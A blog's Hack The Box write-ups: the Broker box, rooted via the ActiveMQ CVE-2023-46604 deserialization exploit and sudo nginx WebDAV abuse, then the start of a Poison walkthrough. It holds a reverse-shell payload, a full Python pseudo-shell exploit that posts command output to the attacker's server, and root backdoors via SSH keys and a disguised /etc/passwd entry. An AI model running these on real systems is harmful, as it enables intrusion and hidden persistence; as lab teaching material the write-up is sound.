    Firstly, let’s see if ActiveMQ was impacted by the recent Log4Jjvulnerability - CVE-2021-44228. A quick Google reveals some message threads on the ActiveMQ support boards confirming that “CVE-2021-44228 has no impact on any ActiveMQ broker because no ActiveMQ broker uses any version of Log4j2.” Despite this, some more digging suggests that ActiveMQ “Classic” does use Log4j for logging, but the latest versions (i.e. 5.15.15 and 5.16.3) use Log4j 1.2.17 which is not impacted by CVE-2021-44228. There’s enough woolly language here to attract my interest - sadly, it’s not uncommon to see vendors rush to claim their products are not vulnerable to “x” without really verifying this or attempting to obfuscate possible issues with jargon - but since our version is 5.15.15 and that’s the exact version being held up as not vulnerable in the documentation we’ll move on for now.

    After a bit more searching and i came across another possible vector - CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker to, quote: “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” See what I mean about obfuscation?! This is a highly abstract way of saying that:

    A deserialization vulnerability exists in Apache ActiveMQ’s OpenWire protocol. This flaw can be exploited by an attacker to execute arbitrary code on the server where ActiveMQ is running.

    We can quickly find a good POC exploit here https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ - the only issue with which is that we’ll need to generate an msfvenom binary to upload to the target - there’s also a python version which will execute a command instead, so let’s give this a whirl. Later on, I’ll write my own version which will give us a pseudoshell, but for now, let’s clone https://github.com/evkl1d/CVE-2023-46604 and give it a go!

    The exploit is well documented and simple enough to try - firstly, well edit poc.xml to add our own address

    <?xml version="1.0" encoding="UTF-8" ?> 
       <beans xmlns="http://www.springframework.org/schema/beans" 
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
         xsi:schemaLocation=" 
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> 
          <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> 
            <constructor-arg> 
            <list> 
              <value>bash</value> 
              <value>-c</value> 
              <value>bash -i &gt;&amp; /dev/tcp/10.10.14.48/8181 0&gt;&amp;1</value> 
            </list> 
            </constructor-arg> 
          </bean> 
       </beans>
    

    and run: python3 exploit.py -i broker.htb -p 61616 -u http://10.10.14.48:8080/poc.xml


       / \  ___| |_(_)_  _____|  \/  |/ _ \    |  _ \ / ___| ____| 
      / _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | |  |  _|  
      / ___ \ (__| |_| |\ V /  __/ |  | | |_| |_____|  _ <| |___| |___  
     /_/  \_\___|\__|_| \_/ \___|_|  |_|\__\_\   |_| \_\\____|_____| 
    
    
    [*] Target: broker.htb:61616 
    [*] XML URL: http://10.10.14.48:8080/poc.xml 
    
    [*] Sending packet: 000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f31302e31302e31342e34383a383038302f706f632e786d6c
    
    
    python3 -m http.server 8080 
    
    Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 
    
    10.129.65.79 - - [10/Nov/2023 14:08:57] "GET /poc.xml HTTP/1.1" 200 -
    
    
    └──╼ **$**nc -nvlp 8181 
    
    listening on [any] 8181 ... 
    
    connect to [10.10.14.48] from (UNKNOWN) [10.129.65.79] 46432 
    
    bash: cannot set terminal process group (875): Inappropriate ioctl for device 
    
    bash: no job control in this shell 
    
    activemq@broker:/opt/apache-activemq-5.15.15/bin$ whoami 
    
    whoami 
    
    activemq
    

    Our shell comes back, and were in as the activemq user

    we’ll quickly grab user.txt from activemq’s home directory - now let’s enumerate

    As always I’ll start by seeing if I have any sudo privileges:

    activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l  
    sudo -l  
    Matching Defaults entries for activemq on broker: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, 
       use_pty 
    
    User activemq may run the following commands on broker: 
       (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    
    

    We have full control over nginx - this is certainly worth exploring - which version do I have?

    activemq@broker:/opt/apache-activemq-5.15.15/bin$ nginx -v 
    nginx version: nginx/1.18.0 (Ubuntu)
    

    Let’s see if we can find any vulnerabilities for this version… we find an article at legal hackers which seems relevant (and worth bearing in mind for the future) https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html however his wont work on this occasion as we need to be www-data.

    So we have no direct exploit - but what we can probably do is change the nginx configuration. Since we’re able to run nginx as sudo - which remember, means we run as root we could actually mount the filesystem root / as a wedav directory - from there we can take a couple of approaches, such as dropping root ssh keys onto the box, or even just adding a user to /etc/passwd.

    Firstly, we’ll create a malicious file

    user root; 
    worker_processes 4; 
    pid /tmp/nginx.pid; 
    events { 
    worker_connections 768; 
    } 
    http { 
    server { 
    listen 7777; 
    root /; 
    autoindex on; 
    dav_methods PUT; 
    } 
    }
    

    Here, we define that the nginx worker processes will be run by root , meaning when we eventually upload a file, it will also be owned by root . The document root will be the root of the filesystem itself (/) - finally, we’ll enable dav_methods PUT, which will enable the WebDAV HTTP extension with the PUT method, which allows clients to upload files via our listening port, 7777. Put together, this configuration exposes the whole filesystem and allows us to write any file we like, as root - that’s a really bad day for a system admin!

    Let’s download our file to the box, and then update the nginx configuration using sudo nginx -c

    activemq@broker:~$ wget http://10.10.14.48:8080/evil.conf 
    wget http://10.10.14.48:8080/evil.conf 
    --2023-11-10 14:26:33--  http://10.10.14.48:8080/evil.conf 
    Connecting to 10.10.14.48:8080... connected. 
    HTTP request sent, awaiting response... 200 OK 
    Length: 158 [application/octet-stream] 
    Saving to: ‘evil.conf’ 
    
       0K                            100% 33.4K=0.005s 
    
    2023-11-10 14:26:33 (33.4 KB/s) - ‘evil.conf’ saved [158/158] 
    activemq@broker:~$ cp evil.conf /tmp 
    activemq@broker:~$ sudo nginx -c /tmp/evil.conf 
    

    The configuration looks to have been applied - let’s run nmap from our attack box to verify:

    Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-10 14:29 GMT 
    Nmap scan report for broker.htb (10.129.65.79) 
    Host is up (0.020s latency). 
    
    PORT   STATE SERVICE 
    7777/tcp open  cbt 
    
    Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
    

    Excellent the port is now open - let’s first try to drop an ssh key on the box. It’ll generate a new ssh key using ssh-keygen on my system, then use curl to put the pubic key into the /root/.ssh folder on broker. I should then be able to log in via ssh.

    ──╼ **$**ssh-keygen                                                                                       
    Generating public/private rsa key pair. 
    Enter file in which to save the key (/home/duck/.ssh/id_rsa): root 
    Enter passphrase (empty for no passphrase):  
    Enter same passphrase again:  
    Your identification has been saved in root 
    Your public key has been saved in root.pub 
    The key fingerprint is: 
    SHA256:YCYo0XwzccK7448KdLqOIj9HIror0tE0ALvrYVjr0I8 
    The key's randomart image is: 
    +---[RSA 3072]----+ 
    |o+ .o..      | 
    | o+.=o      | 
    |o .o.++      | 
    | o  ++ .     | 
    |...+ o  S     | 
    |++=.=       | 
    |**o= .      | 
    |X+=oo.      | 
    |XBE+o..      | 
    +----[SHA256]-----+ 
    
    ─╼ **$**curl -X PUT broker.htb:7777/root/.ssh/authorized_keys -d "$(cat root.pub)"                                                      
    ──╼ **$**ssh root@broker.htb -i ./root 
    The authenticity of host 'broker.htb (10.129.65.79)' can't be established. 
    ECDSA key fingerprint is SHA256:/GPlBWttNcxd3ra0zTlmXrcsc1JM6jwKYH5Bo5qE5DM. 
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
    Warning: Permanently added 'broker.htb,10.129.65.79' (ECDSA) to the list of known hosts. 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64) 
     
     \* Documentation:  https://help.ubuntu.com 
     \* Management:   https://landscape.canonical.com 
     \* Support:     https://ubuntu.com/advantage 
     
      System information as of Fri Nov 10 02:35:47 PM UTC 2023 
     
      System load:      0.0 
      Usage of /:       70.4% of 4.63GB 
      Memory usage:      12% 
      Swap usage:       0% 
      Processes:       159 
      Users logged in:    0 
      IPv4 address for eth0: 10.129.65.79 
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98 
     
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 
      just raised the bar for easy, resilient and secure K8s cluster deployment. 
     
      https://ubuntu.com/engage/secure-kubernetes-at-the-edge 
     
    Expanded Security Maintenance for Applications is not enabled. 
     
    0 updates can be applied immediately. 
     
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
     
     
    root@broker:~#
    
    

    And we have root!

    Another option here would have been to edit /etc/passwd - strictly speaking, we can’t edit the file as the activemq user, however using the webdav folder we’ve set up we can overwrite the current file. Let’s grab the existing /etc/passwd

    root:x:0:0:root:/root:/bin/bash 
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
    bin:x:2:2:bin:/bin:/usr/sbin/nologin 
    sys:x:3:3:sys:/dev:/usr/sbin/nologin 
    sync:x:4:65534:sync:/bin:/bin/sync 
    games:x:5:60:games:/usr/games:/usr/sbin/nologin 
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin 
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin 
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin 
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin 
    pollinate:x:105:1::/var/cache/pollinate:/bin/false 
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin 
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin 
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin 
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin 
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false 
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin 
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin 
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin 
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false 
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash 
    _laurel:x:998:998::/var/log/laurel:/bin/false
    

    And we’ll edit /etc/passwd to add my own root user, then post it to the box:

    └──╼ **$**cat passwd 
    
    root:x:0:0:root:/root:/bin/bash  
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
    bin:x:2:2:bin:/bin:/usr/sbin/nologin  
    sys:x:3:3:sys:/dev:/usr/sbin/nologin  
    sync:x:4:65534:sync:/bin:/bin/sync  
    games:x:5:60:games:/usr/games:/usr/sbin/nologin  
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin  
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin  
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin  
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin  
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin  
    pollinate:x:105:1::/var/cache/pollinate:/bin/false  
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin  
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin  
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin  
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin  
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false  
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin  
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin  
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin  
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false  
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash  
    _laurel:x:998:998::/var/log/laurel:/bin/false 
    duck:YIlaK190xVPVc:0:0:duck:/root:/bin/bash
    
    └──╼ **$**curl -X PUT broker.htb:7777/etc/passwd -d "$(cat passwd)"   
    

    With my known user and password added to /etc/passwd, I can now either switch user in my existing shell, or simply ssh in:

    ssh duck@broker.htb 
    duck@broker.htb's password:  
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64) 
     
     \* Documentation:  https://help.ubuntu.com 
     \* Management:   https://landscape.canonical.com 
     \* Support:     https://ubuntu.com/advantage 
     
      System information as of Fri Nov 10 02:41:40 PM UTC 2023 
     
      System load:      0.0 
      Usage of /:       70.4% of 4.63GB 
      Memory usage:      12% 
      Swap usage:       0% 
      Processes:       162 
      Users logged in:    0 
      IPv4 address for eth0: 10.129.65.79 
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98 
     
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s 
      just raised the bar for easy, resilient and secure K8s cluster deployment. 
     
      https://ubuntu.com/engage/secure-kubernetes-at-the-edge 
     
    Expanded Security Maintenance for Applications is not enabled. 
     
    0 updates can be applied immediately. 
     
    Enable ESM Apps to receive additional future security updates. 
    See https://ubuntu.com/esm or run: sudo pro status 
     
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings 
     
    
    
    Last login: Fri Nov 10 14:35:48 2023 from 10.10.14.48 
    root@broker:~# whoami 
    root
    

    How comes this works? Aren’t Linux passwords now stored in /etc/shadow? They certainly are - and if you were to add a user with useradd that’s exactly where they would go. The second field in /etc/passwd represents user passwords, and you’ll see that most have an “x” - this simply means that an encrypted password is stored in /etc/shadow - however, /etc/password actually still has precedence, so if I add the hash of a known password in this space instead, I have a valid user. Of course, in this scenario we could edit /etc/shadow anyway - but this approach is worth knowing, in case something really dumb, like chmod 777 /etc/passwd has taken place.

    Of course, to look at /etc/passwd this is quite obvious - since this is HTB it really doesn’t matter, but for a real pentest, how about this?:

    root:x:0:0:root:/root:/bin/bash  
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
    bin:x:2:2:bin:/bin:/usr/sbin/nologin  
    sys:x:3:3:sys:/dev:/usr/sbin/nologin  
    sync:x:4:65534:sync:/bin:/bin/sync  
    games:x:5:60:games:/usr/games:/usr/sbin/nologin  
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin  
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin  
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin  
    messagebus:x:103:104::/nonexistent:/usr/sbin/nologin  
    systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin  
    pollinate:x:105:1::/var/cache/pollinate:/bin/false  
    msgsys:YIlaK190xVPVc:0:0:msgsys:/root:/bin/sh  
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin  
    syslog:x:107:113::/home/syslog:/usr/sbin/nologin  
    uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin  
    tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin  
    tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false  
    landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin  
    fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin  
    usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin  
    lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false  
    activemq:x:1000:1000:,,,:/home/activemq:/bin/bash  
    _laurel:x:998:998::/var/log/laurel:/bin/false 
    

    Some form of file integrity monitor (or a blue teamer with a simple diff tool) will find this without much trouble - but from visual inspection it’s hard!

    └──╼ $ssh msgsys@broker.htb
    msgsys@broker.htb's password: 
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
    
     \* Documentation:  https://help.ubuntu.com
     \* Management:     https://landscape.canonical.com
     \* Support:        https://ubuntu.com/advantage
    
      System information as of Fri Nov 10 02:49:32 PM UTC 2023
    
      System load:           0.0
      Usage of /:            70.5% of 4.63GB
      Memory usage:          12%
      Swap usage:            0%
      Processes:             162
      Users logged in:       0
      IPv4 address for eth0: 10.129.65.79
      IPv6 address for eth0: dead:beef::250:56ff:fe96:ec98
    
     \* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
       just raised the bar for easy, resilient and secure K8s cluster deployment.
    
       https://ubuntu.com/engage/secure-kubernetes-at-the-edge
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    
    Last login: Fri Nov 10 14:48:00 2023 from 10.10.14.48
    root@broker:~# 
    

    Writing a better exploit

    Now, let’s take a moment to make the exploit from earlier a little more user-friendly - ideally, I like to be able to interact with a system in a minimal way, without uploading a binary and without having to spawn a shell if I don’t need to. This ended up getting a bit more complex than most blog readers want to pick through, so at a high level, here I can use my own simple server to allow us to send and receive messages via HTTP and use a function to automatically customise the required XML file for each command we’d like to send. By modifying the command we’re executing on the target system to include a POST back of the command result, customising the response and cleaning it up on our end - then sticking the whole thing into a loop - we can generate a pseudo shell which functions pretty well! I’ve also included a quick and dirty connection check. Here’s the repo if you like to try it or learn more: https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

    import socket
    import argparse
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from xml.etree.ElementTree import Element, SubElement, tostring
    import threading
    from time import sleep
    
    
    def main(ip, port, srvip, srvport):
        url = "http://" + srvip + ":" + str(srvport) + "/poc.xml"
        
        print("#################################################################################")
        print("#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #")
        print("#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #")
        print("#################################################################################")
        print()
        
        print("[*] Target:", f"{ip}:{port}")
        print("[*] Serving XML at:", url)
        print("[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.")
        print("[*] Type 'exit' to quit")
        print()
        
        global connected
        connected = False
        if not connected:
            print("#################################################################################")
            print("# Not yet connected, send a command to test connection to host.                 #")
            print("# Prompt will change to Apache ActiveMQ$ once at least one response is received #")
            print("# Please note this is a one-off connection check, re-run the script if you      #")
            print("# want to re-check the connection.                                              #")
            print("#################################################################################")
            print()
        else:
            pass
        
        while True:
            prompt = "[Target not responding!]$ " if not connected else "Apache ActiveMQ$ "
            command = input(prompt)
            if command.lower() == 'exit':
                print("Exiting...")
                return
            
            if not command:
                print("Please enter a valid command.")
                continue
            else:
                execute(ip, port, srvip, srvport, command, url)
    
    
    def execute(ip, port, srvip, srvport, command, url):
        class_name = "org.springframework.context.support.ClassPathXmlApplicationContext"
        message = url
        header = "1f00000000000000000001"
        body = header + "01" + int2hex(len(class_name), 4) + string2hex(class_name) + "01" + int2hex(len(message), 4) + string2hex(message)
        payload = int2hex(len(body) // 2, 8) + body
        data = bytes.fromhex(payload)
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect((ip, port))
        conn.send(data)
        conn.close()
        
        command = command
        generate_xml(command, srvip, srvport)
        serve_xml_content(srvip, srvport)
        return
    
    
    def generate_xml(command, srvip, srvport): 
        root = Element('beans', attrib={
            'xmlns': 'http://www.springframework.org/schema/beans',
            'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
            'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd'
        })
    
        bean = SubElement(root, 'bean', attrib={'id': 'pb', 'class': 'java.lang.ProcessBuilder', 'init-method': 'start'})
        constructor_arg = SubElement(bean, 'constructor-arg')
        l = SubElement(constructor_arg, 'list')
        full_command = command + """ | awk '{print $0";"}' | curl -X POST -d @- http://""" + srvip + ":" + str(srvport) + "/receive_data" #use ; as a separator for later
        values = ['bash', '-c', full_command]
        
        for value in values:
            SubElement(l, 'value').text = value
            
        xml_string = '<?xml version="1.0" encoding="UTF-8" ?>\n' + tostring(root).decode()
        with open('poc.xml', 'w') as file:
            file.write(xml_string)
        
        return xml_string
    
    
    run = True
    
    
    class CustomHTTPServer(HTTPServer):
        def handle_timeout(self):
            if not run:
                self.shutdown()
    
    
    class XMLServer(BaseHTTPRequestHandler):
        def log_message(self, format, *args):
            pass  # Override log_message to do nothing
        
        def do_GET(self):
            if self.path == '/poc.xml':
                with open('poc.xml', 'rb') as file:
                    self.send_response(200)
                    self.send_header('Content-type', 'text/xml')
                    self.end_headers()
                    self.wfile.write(file.read())  # serve poc.xml
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b'404 - Not Found')
        
        def do_POST(self):
            content_length = int(self.headers['Content-Length'])
            post_data = self.rfile.read(content_length).decode()
            
            response_data = post_data.split(';') # use the ; to reconstruct line breaks
            
            for line in response_data:
                print(line)
            
            self.send_response(200)
            self.end_headers()
            global connected
            connected = True
            global run_server
            run_server = False
    
    
    def serve_xml_content(srvip, srvport):
        server_address = (srvip, srvport)
        httpd = HTTPServer(server_address, XMLServer)
        
        httpd.timeout = 1  # Set the server timeout
        
        global run_server
        run_server = True
        
        while run_server:
            httpd.handle_request()
        
        httpd.server_close()  # Close the server socket
        
        return
    
    
    def string2hex(s):
        return s.encode().hex()
    
    
    def int2hex(i, n):
        if n == 4:
            return format(i, '04x')
        elif n == 8:
            return format(i, '08x')
        else:
            raise ValueError("n must be 4 or 8")
    
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("-i", "--ip", help="ActiveMQ Server IP or Hostname", required=True)
        parser.add_argument("-p", "--port", type=int, default="61616", help="ActiveMQ Server Port, defaults to 61616", required=False)
        parser.add_argument("-si", "--srvip",  help="Serve IP", required=True)
        parser.add_argument("-sp", "--srvport", type=int, default=8080, help="Serve port, defaults to 8080", required=False)
        args = parser.parse_args()
        
        main(args.ip, args.port, args.srvip, args.srvport)
    

    Avoiding the Hack - Lessons learned

    So, what can we learn from this box? As is often the case we begin with some out-of-date software with a vulnerability - worse, one with a publicly available POC. What’s a bit different here is that the vulnerable software isn’t really designed to be user-facing - instead, it’s middleware, designed to do a job and likely in place to facilitate communication between other “value-producing” systems. It’s not uncommon for applications like this either to be missed or to sink lower on the patch priority list because:

    1. Middleware often does not directly produce value, which, in the eyes of management, often makes it a lower priority.
    2. Message queuing systems (for just one example) are not seen as (and often probably shouldn’t be) public-facing, which can give IT teams a false sense of security.
    3. IT teams are reluctant to update components with multiple points of integration - if you worry about an update messing up your stand-alone web server you worry a lot more about a system which interconnects 4 or 5 different applications!
    4. Sometimes, it’s not clear who is actually responsible for them!

    At the structural level, many of these issues can be solved (or at least managed) through good documentation and IT governance processes, whereas points like number 4 which tend to arise as a result of departmental (or team) siloing can be countered through targeted steps such as appointing collaborative security champions, or by adopting more holistic approaches like DevSecOps. It’s tempting to say that “ApacheMQ Shouldn’t be exposed to external users anyway” - and in many cases that’s probably true - however, in a real scenario it’s entirley possible that I’d be attacking this box not from “cold” but rather having already gained a foothold into an enterprise network. Truly, it’s dangerous to think of systems as “internal” or “external” in the first place - rather, to the greatest possible extent, all systems should be secured as if they were subject to external attack - because they might be.

    In terms of privilege escalation, this was an excellent lesson in the risks associated with sudo privileges and web servers - once upon a time, not that long ago, one of the common calls from security professionals was “stop running your server as root” and this is why.. Unfortunately, running the server as a different user and someone sudo privileges isn’t much better! Keep in mind that this isn’t specifically an Nginx issue either - we could have performed the same attack using something like Apache.

    That’s all for this one, see you in the next!

  • Writeups

    Poison is an older machine, but one of the few BSD boxes on the HTB platform - I felt like giving something a bit different a go!

    Gaining user access

    As always we’ll add poison.htb to our /etc/hosts file and give it a quick ping:

    └──╼ $ping poison.htb
    PING poison.htb (10.129.6.248) 56(84) bytes of data.
    64 bytes from poison.htb (10.129.6.248): icmp_seq=1 ttl=63 time=20.6 ms
    64 bytes from poison.htb (10.129.6.248): icmp_seq=2 ttl=63 time=17.4 ms
    

    And let’s let nmap do its work:

    └──╼ **$**nmap poison.htb -sC -sV  
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-03 09:21 GMT 
    Nmap scan report for poison.htb (10.129.6.248) 
    Host is up (0.017s latency). 
    Not shown: 998 closed tcp ports (conn-refused) 
    PORT  STATE SERVICE VERSION 
    22/tcp open  ssh   OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) 
    | ssh-hostkey:  
    |  2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) 
    |  256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) 
    |_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 
    80/tcp open  http   Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) 
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 
    |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 
    Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd 
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
    Nmap done: 1 IP address (1 host up) scanned in 14.19 seconds
    

    We have a webserver running, and ssh - a fairly typical nmap result. We can also confirm that this box is FreeBSD. Taking a look at the webserver, there’s a basic page for testing php scripts - sounds risky!

    Let’s give listfiles.php a go..

    It seems like the application is literally running the script we specify and returning the result, here we’ve got an array of files in the directory. That pwdbackup.txt sure does sound interesting. I wonder if the file is literally just being included by index.php - can we just feed the app pwdbackup.txt?

    Yes we can, and here it is:

    When viewing a text file in a browser we often get some formatting which is designed to be helpful, but can end up causing issues with unexpected spaces etc. This is also a bit hard to read, so we’ll use “view source” on the page to check out the raw text.

    This looks like base64 - the 13 encoding runs hint is handy, but let’s first try it “as is” just in case…

